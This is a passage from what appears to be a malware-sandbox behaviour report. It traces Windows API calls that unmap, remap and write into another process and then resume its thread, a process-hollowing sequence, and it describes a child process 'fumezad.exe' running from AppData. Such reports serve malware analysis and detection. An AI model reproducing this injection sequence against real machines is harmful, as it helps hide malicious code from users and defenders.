[387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0127.695] ReadProcessMemory (in: hProcess=0x58, lpBaseAddress=0x7efde008, lpBuffer=0x180e08, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x180e08*, lpNumberOfBytesRead=0x0) returned 1 [0127.695] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x180994 | out: Wow64Process=0x180994) returned 1 [0127.698] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x60 [0127.698] GetFileSize (in: hFile=0x60, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13b740 [0127.699] VirtualAlloc (lpAddress=0x0, dwSize=0x13b740, flAllocationType=0x3000, flProtect=0x4) returned 0x1c40000 [0127.699] ReadFile (in: hFile=0x60, lpBuffer=0x1c40000, nNumberOfBytesToRead=0x13b740, lpNumberOfBytesRead=0x1808cc, lpOverlapped=0x0 | out: lpBuffer=0x1c40000*, lpNumberOfBytesRead=0x1808cc*=0x13b740, lpOverlapped=0x0) returned 1 [0127.720] VirtualAlloc (lpAddress=0x0, dwSize=0x180000, flAllocationType=0x3000, flProtect=0x4) returned 0x1d80000 [0127.731] CloseHandle (hObject=0x60) returned 1 [0127.731] VirtualFree (lpAddress=0x1c40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0127.737] VirtualFree (lpAddress=0x1d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0127.751] NtUnmapViewOfSection (ProcessHandle=0x58, BaseAddress=0x400000) returned 0x0 [0127.751] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x180950 | out: Wow64Process=0x180950) returned 1 [0127.754] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x60 [0127.754] GetFileSize (in: hFile=0x60, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13b740 [0127.755] VirtualAlloc (lpAddress=0x0, dwSize=0x13b740, flAllocationType=0x3000, flProtect=0x4) returned 0x1c40000 [0127.755] ReadFile (in: hFile=0x60, lpBuffer=0x1c40000, nNumberOfBytesToRead=0x13b740, lpNumberOfBytesRead=0x180888, lpOverlapped=0x0 | out: lpBuffer=0x1c40000*, lpNumberOfBytesRead=0x180888*=0x13b740, lpOverlapped=0x0) returned 1 [0127.767] VirtualAlloc (lpAddress=0x0, dwSize=0x180000, flAllocationType=0x3000, flProtect=0x4) returned 0x1d80000 [0127.779] CloseHandle (hObject=0x60) returned 1 [0127.779] VirtualFree (lpAddress=0x1c40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0127.794] VirtualFree (lpAddress=0x1d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0127.818] NtCreateSection (in: SectionHandle=0x18098c, DesiredAccess=0xe, ObjectAttributes=0x0, MaximumSize=0x180df4, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x18098c*=0x60) returned 0x0 [0127.818] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x180924 | out: Wow64Process=0x180924) returned 1 [0127.827] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0127.827] GetFileSize (in: hFile=0x5c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13b740 [0127.827] VirtualAlloc (lpAddress=0x0, dwSize=0x13b740, flAllocationType=0x3000, flProtect=0x4) returned 0x1c40000 [0127.827] ReadFile (in: hFile=0x5c, lpBuffer=0x1c40000, nNumberOfBytesToRead=0x13b740, lpNumberOfBytesRead=0x18085c, lpOverlapped=0x0 | out: lpBuffer=0x1c40000*, lpNumberOfBytesRead=0x18085c*=0x13b740, lpOverlapped=0x0) returned 1 [0127.848] VirtualAlloc (lpAddress=0x0, dwSize=0x180000, flAllocationType=0x3000, flProtect=0x4) returned 0x1d80000 [0127.859] CloseHandle (hObject=0x5c) returned 1 [0127.860] VirtualFree (lpAddress=0x1c40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0127.873] VirtualFree (lpAddress=0x1d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0127.878] NtMapViewOfSection (in: SectionHandle=0x60, ProcessHandle=0x58, BaseAddress=0x180980*=0x400000, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x180928*=0x0, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x180980*=0x400000, SectionOffset=0x0, ViewSize=0x180928*=0x2b000) returned 0x0 [0127.878] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x180924 | out: Wow64Process=0x180924) returned 1 [0127.881] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0127.881] GetFileSize (in: hFile=0x5c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13b740 [0127.882] VirtualAlloc (lpAddress=0x0, dwSize=0x13b740, flAllocationType=0x3000, flProtect=0x4) returned 0x1c40000 [0127.882] ReadFile (in: hFile=0x5c, lpBuffer=0x1c40000, nNumberOfBytesToRead=0x13b740, lpNumberOfBytesRead=0x18085c, lpOverlapped=0x0 | out: lpBuffer=0x1c40000*, lpNumberOfBytesRead=0x18085c*=0x13b740, lpOverlapped=0x0) returned 1 [0127.893] VirtualAlloc (lpAddress=0x0, dwSize=0x180000, flAllocationType=0x3000, flProtect=0x4) returned 0x1d80000 [0127.907] CloseHandle (hObject=0x5c) returned 1 [0127.907] VirtualFree (lpAddress=0x1c40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0127.913] VirtualFree (lpAddress=0x1d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0127.919] NtMapViewOfSection (in: SectionHandle=0x60, ProcessHandle=0xffffffffffffffff, BaseAddress=0x180980*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x180928*=0x2b000, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x180980*=0x1c40000, SectionOffset=0x0, ViewSize=0x180928*=0x2b000) returned 0x0 [0127.920] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x180968 | out: Wow64Process=0x180968) returned 1 [0127.923] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0127.923] GetFileSize (in: hFile=0x5c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13b740 [0127.923] VirtualAlloc (lpAddress=0x0, dwSize=0x13b740, flAllocationType=0x3000, flProtect=0x4) returned 0x1c70000 [0127.924] ReadFile (in: hFile=0x5c, lpBuffer=0x1c70000, nNumberOfBytesToRead=0x13b740, lpNumberOfBytesRead=0x1808a0, lpOverlapped=0x0 | out: lpBuffer=0x1c70000*, lpNumberOfBytesRead=0x1808a0*=0x13b740, lpOverlapped=0x0) returned 1 [0127.930] VirtualAlloc (lpAddress=0x0, dwSize=0x180000, flAllocationType=0x3000, flProtect=0x4) returned 0x1db0000 [0127.941] CloseHandle (hObject=0x5c) returned 1 [0127.941] VirtualFree (lpAddress=0x1c70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0127.950] VirtualFree (lpAddress=0x1db0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0127.956] NtWriteVirtualMemory (in: ProcessHandle=0x58, BaseAddress=0x7efde008, Buffer=0x180b04*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x18096c | out: Buffer=0x180b04*, NumberOfBytesWritten=0x18096c*=0x4) returned 0x0 [0127.956] SetThreadContext (hThread=0x54, lpContext=0x180b24*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x401000, Ebp=0x0, Eip=0x777d01c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0127.956] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x1809a0 | out: Wow64Process=0x1809a0) returned 1 [0127.960] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0127.960] GetFileSize (in: hFile=0x5c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13b740 [0127.960] VirtualAlloc (lpAddress=0x0, dwSize=0x13b740, flAllocationType=0x3000, flProtect=0x4) returned 0x1c70000 [0127.960] ReadFile (in: hFile=0x5c, lpBuffer=0x1c70000, nNumberOfBytesToRead=0x13b740, lpNumberOfBytesRead=0x1808c4, lpOverlapped=0x0 | out: lpBuffer=0x1c70000*, lpNumberOfBytesRead=0x1808c4*=0x13b740, lpOverlapped=0x0) returned 1 [0127.967] VirtualAlloc (lpAddress=0x0, dwSize=0x180000, flAllocationType=0x3000, flProtect=0x4) returned 0x1db0000 [0127.979] CloseHandle (hObject=0x5c) returned 1 [0127.979] VirtualFree (lpAddress=0x1c70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0127.985] VirtualFree (lpAddress=0x1db0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0127.990] NtResumeThread (in: ThreadHandle=0x54, SuspendCount=0x1809a4 | out: SuspendCount=0x1809a4*=0x1) returned 0x0 [0128.027] CloseHandle (hObject=0x58) returned 1 [0128.027] CloseHandle (hObject=0x54) returned 1 [0128.027] CloseHandle (hObject=0x60) returned 1 [0128.027] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x180994 | out: Wow64Process=0x180994) returned 1 [0128.030] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x60 [0128.030] GetFileSize (in: hFile=0x60, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13b740 [0128.030] VirtualAlloc (lpAddress=0x0, dwSize=0x13b740, flAllocationType=0x3000, flProtect=0x4) returned 0x1c70000 [0128.030] ReadFile (in: hFile=0x60, lpBuffer=0x1c70000, nNumberOfBytesToRead=0x13b740, lpNumberOfBytesRead=0x1808cc, lpOverlapped=0x0 | out: lpBuffer=0x1c70000*, lpNumberOfBytesRead=0x1808cc*=0x13b740, lpOverlapped=0x0) returned 1 [0128.035] VirtualAlloc (lpAddress=0x0, dwSize=0x180000, flAllocationType=0x3000, flProtect=0x4) returned 0x1db0000 [0128.045] CloseHandle (hObject=0x60) returned 1 [0128.045] VirtualFree (lpAddress=0x1c70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0128.051] VirtualFree (lpAddress=0x1db0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0128.057] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x1c40000) returned 0x0 [0128.058] ExitProcess (uExitCode=0x0) Process: id = "16" image_name = "fumezad.exe" filename = "c:\\users\\aetadzjz\\appdata\\roaming\\cleanmem\\fumezad.exe" page_root = "0x410c7000" os_pid = "0x844" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "15" os_parent_pid = "0x240" cmd_line = "\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7e8" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2236 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2237 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2238 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2239 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2240 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 2241 start_va = 0x190000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 2242 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2243 start_va = 0x400000 end_va = 0x479fff entry_point = 0x400000 region_type = mapped_file name = "fumezad.exe" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\cleanmem\\fumezad.exe") Region: id = 2244 start_va = 0x775e0000 end_va = 0x77788fff entry_point = 0x775e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2245 start_va = 0x777c0000 end_va = 0x7793ffff entry_point = 0x777c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2246 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 2247 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 2248 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 2249 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 2250 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2251 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2252 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2259 start_va = 0x400000 end_va = 0x42afff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2267 start_va = 0x370000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 2268 start_va = 0x750d0000 end_va = 0x7512bfff entry_point = 0x750d0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2269 start_va = 0x75240000 end_va = 0x7527efff entry_point = 0x75240000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2270 start_va = 0x752b0000 end_va = 0x752b7fff entry_point = 0x752b0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2271 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2272 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2273 start_va = 0x5f0000 end_va = 0x6effff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 2274 start_va = 0x76110000 end_va = 0x76155fff entry_point = 0x76110000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2275 start_va = 0x76540000 end_va = 0x7664ffff entry_point = 0x76540000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: 